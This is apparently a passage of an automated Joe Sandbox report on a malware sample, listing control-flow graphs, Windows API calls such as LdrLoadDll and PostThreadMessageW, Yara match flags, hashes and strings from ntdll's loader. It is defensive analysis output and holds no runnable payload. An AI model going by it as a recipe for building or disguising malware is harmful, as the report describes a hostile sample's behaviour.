                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                      • Instruction Fuzzy Hash: 1911E6B6504240CFCB06CF10D5C4B56BF72FB95314F24C6A9DC0A0B256C33AD99ADBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 879e68bf1ddad6efa2c20cf0d2cc6de956e6a20c1d7f6da65c06049d8efad7b2
                                                                                                      • Instruction ID: 6bb5d331657da7898590dbcd795ed20d4c8364265af31bc990a12b8300e8e449
                                                                                                      • Opcode Fuzzy Hash: 879e68bf1ddad6efa2c20cf0d2cc6de956e6a20c1d7f6da65c06049d8efad7b2
                                                                                                      • Instruction Fuzzy Hash: CE51D383DC4D95ABDF0008BBFC917E5A780C23723DF96D349D2B84A6D66584068793A6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.2%
                                                                                                      Dynamic/Decrypted Code Coverage:4.7%
                                                                                                      Signature Coverage:8.7%
                                                                                                      Total number of Nodes:150
                                                                                                      Total number of Limit Nodes:16

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 185 4172c3-4172ec call 42daf3 188 4172f2-417300 call 42e013 185->188 189 4172ee-4172f1 185->189 192 417310-417321 call 42c483 188->192 193 417302-41730d call 42e2b3 188->193 199 417323-417337 LdrLoadDll 192->199 200 41733a-41733d 192->200 193->192 199->200
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417335
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 6fba1dc22c45e035d7cfd6925315d8c7f623b9e23ecf1f98383965f4673800c9
                                                                                                      • Instruction ID: be12655ba759db9e0842be656872b8ab626e7f57d8359b2776f7ad09e683dc73
                                                                                                      • Opcode Fuzzy Hash: 6fba1dc22c45e035d7cfd6925315d8c7f623b9e23ecf1f98383965f4673800c9
                                                                                                      • Instruction Fuzzy Hash: AD015EB1E0020DABDF10DAE5DD42FDEB3B8AB14308F00419AED0897240F675EB458B95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 213 42aed3-42af0f call 404a83 call 42bf83 NtClose
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: df1470d35645786788c12b704a489055868d3b7b6fb03ba64aaf800453adc970
                                                                                                      • Instruction ID: 688dba45891aa492f683e5c8dc72cab05f99d544db877472c52698b64936e208
                                                                                                      • Opcode Fuzzy Hash: df1470d35645786788c12b704a489055868d3b7b6fb03ba64aaf800453adc970
                                                                                                      • Instruction Fuzzy Hash: 6BE04F313402147BD510EB5ADC42FD7B75CDFC5B24F004019FA08A7142C6B1B91187F4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 227 1142b60-1142b6c LdrInitializeThunk
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: a90c2b1da3a24100a86a9835afa027171611ddc174f0a61628c0e0b864a7baf4
                                                                                                      • Instruction ID: 24c54b08d534af1a448593e9c19fc1330cb911b1899edcd7107a9966507bce0f
                                                                                                      • Opcode Fuzzy Hash: a90c2b1da3a24100a86a9835afa027171611ddc174f0a61628c0e0b864a7baf4
                                                                                                      • Instruction Fuzzy Hash: B690026120240043424971598514616400A97E0201B55C021F5115590DC62589916625
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 3b1c48adf025244af7bc636abfddebca4b121fac4d8d8fad738348bce1348cb5
                                                                                                      • Instruction ID: e8523e5f539f76d97e6074d5a3e98f1b02a3e4efa5dbe39e5cf5af5196f756f2
                                                                                                      • Opcode Fuzzy Hash: 3b1c48adf025244af7bc636abfddebca4b121fac4d8d8fad738348bce1348cb5
                                                                                                      • Instruction Fuzzy Hash: B290023120140453D25571598604707000997D0241F95C412B4525558DD7568A52A621
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 228 1142c70-1142c7c LdrInitializeThunk
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 4acbf673a99cf0cb73d2cb224781aab4a0c1cde6cc9a44e086f3f592bdc2dd3e
                                                                                                      • Instruction ID: 3bc3e2892cb4fc14f3fb96c7f22e7f9f92baf7275aae44581ea1ff5ad72ae39a
                                                                                                      • Opcode Fuzzy Hash: 4acbf673a99cf0cb73d2cb224781aab4a0c1cde6cc9a44e086f3f592bdc2dd3e
                                                                                                      • Instruction Fuzzy Hash: E490023120148842D2547159C50474A000597D0301F59C411B8525658DC79589917621
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: cbfdf6cad0dca05251499e114acad9e979c719ef36b0f4eda97f0819788579aa
                                                                                                      • Instruction ID: 3ca4f1105e5f8c84f35f36511cc64975d0b04f166e50e3c8b1360365d02ffd98
                                                                                                      • Opcode Fuzzy Hash: cbfdf6cad0dca05251499e114acad9e979c719ef36b0f4eda97f0819788579aa
                                                                                                      • Instruction Fuzzy Hash: FF90023160550442D24471598614706100597D0201F65C411B4525568DC7958A516AA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 0041393A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      • Opcode ID: 4e3f3cdf01874b8e653f28d3aa68fbcb1fa7f1bbc9d5dd1ced0f5bf2568d3b3f
                                                                                                      • Instruction ID: dad3f1bf3461ee6743ac2613c6a1a15b35489b91ab018fdad6f73098214db0fa
                                                                                                      • Opcode Fuzzy Hash: 4e3f3cdf01874b8e653f28d3aa68fbcb1fa7f1bbc9d5dd1ced0f5bf2568d3b3f
                                                                                                      • Instruction Fuzzy Hash: C3213BB2E0515D7EDB109AE5DC81CEFBF7CEB817A4F044169FA04A7201D62D4E468BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 18 4138bb-4138d5 21 4138dd-41392d call 42d8a3 call 4172c3 call 4049f3 call 424153 18->21 22 4138d8 call 42ce93 18->22 31 41394d-413953 21->31 32 41392f-41393e PostThreadMessageW 21->32 22->21 32->31 33 413940-41394a 32->33 33->31
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 0041393A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      • Opcode ID: 269268a35bc773475876693d8e8c3953469ca095ce7f5abf29454d4a764a62b1
                                                                                                      • Instruction ID: bf72f905077f62352338d02f57188b15978831edf82210be98aaa5911d9822eb
                                                                                                      • Opcode Fuzzy Hash: 269268a35bc773475876693d8e8c3953469ca095ce7f5abf29454d4a764a62b1
                                                                                                      • Instruction Fuzzy Hash: 0311E5B1D0111C7AEB109AD1DC81DEF7B7CEF856A4F058069FA14A7141D67C4E068BB5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 0041393A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 57 42b243-42b284 call 404a83 call 42bf83 RtlFreeHeap
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B27F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID: t`A
                                                                                                      • API String ID: 3298025750-3365864255
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 201 417343-417356 202 417314-417321 call 42c483 201->202 203 417358-41735a 201->203 206 417323-417337 LdrLoadDll 202->206 207 41733a-41733d 202->207 206->207
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417335
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 208 42b1f3-42b237 call 404a83 call 42bf83 RtlAllocateHeap
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,0041DB0B,?,?,00000000,?,0041DB0B,?,?,?), ref: 0042B232
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 218 42b293-42b2cc call 404a83 call 42bf83 ExitProcess
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,00000000,?,?,3689612B,?,?,3689612B), ref: 0042B2C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 223 1142c0a-1142c0f 224 1142c11-1142c18 223->224 225 1142c1f-1142c26 LdrInitializeThunk 223->225
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2160512332
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01175543
                                                                                                      • undeleted critical section in freed memory, xrefs: 0117542B
                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011754E2
                                                                                                      • Critical section debug info address, xrefs: 0117541F, 0117552E
                                                                                                      • Address of the debug info found in the active list., xrefs: 011754AE, 011754FA
                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0117540A, 01175496, 01175519
                                                                                                      • corrupted critical section, xrefs: 011754C2
                                                                                                      • double initialized or corrupted critical section, xrefs: 01175508
                                                                                                      • Critical section address., xrefs: 01175502
                                                                                                      • Critical section address, xrefs: 01175425, 011754BC, 01175534
                                                                                                      • Invalid debug info address of this critical section, xrefs: 011754B6
                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011754CE
                                                                                                      • Thread identifier, xrefs: 0117553A
                                                                                                      • 8, xrefs: 011752E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                      • API String ID: 0-2368682639
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • @, xrefs: 0117259B
                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01172412
                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011722E4
                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01172506
                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01172602
                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01172498
                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011724C0
                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0117261F
                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01172409
                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01172624
                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011725EB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                      • API String ID: 0-4009184096
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                      • API String ID: 0-2515994595
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                      • API String ID: 0-1700792311
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$`,$h=$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-3391357973
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01188A67
                                                                                                      • `,, xrefs: 01188A35, 01188A5F
                                                                                                      • VerifierDebug, xrefs: 01188CA5
                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01188B8F
                                                                                                      • VerifierFlags, xrefs: 01188C50
                                                                                                      • HandleTraces, xrefs: 01188C8F
                                                                                                      • VerifierDlls, xrefs: 01188CBD
                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01188A3D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags$`,
                                                                                                      • API String ID: 0-1326338960
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$`,$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2254957362
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                      • API String ID: 0-1109411897
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011721BF
                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 01172165
                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01172178
                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01172180
                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01172160, 0117219A, 011721BA
                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0117219F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                      • API String ID: 0-861424205
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 011781E5
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01178181, 011781F5
                                                                                                      • LdrpInitializeProcess, xrefs: 0113C6C4
                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01178170
                                                                                                      • LdrpInitializeImportRedirection, xrefs: 01178177, 011781EB
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0113C6C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                      • API String ID: 0-475462383
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 01142DF0: LdrInitializeThunk.NTDLL ref: 01142DFA
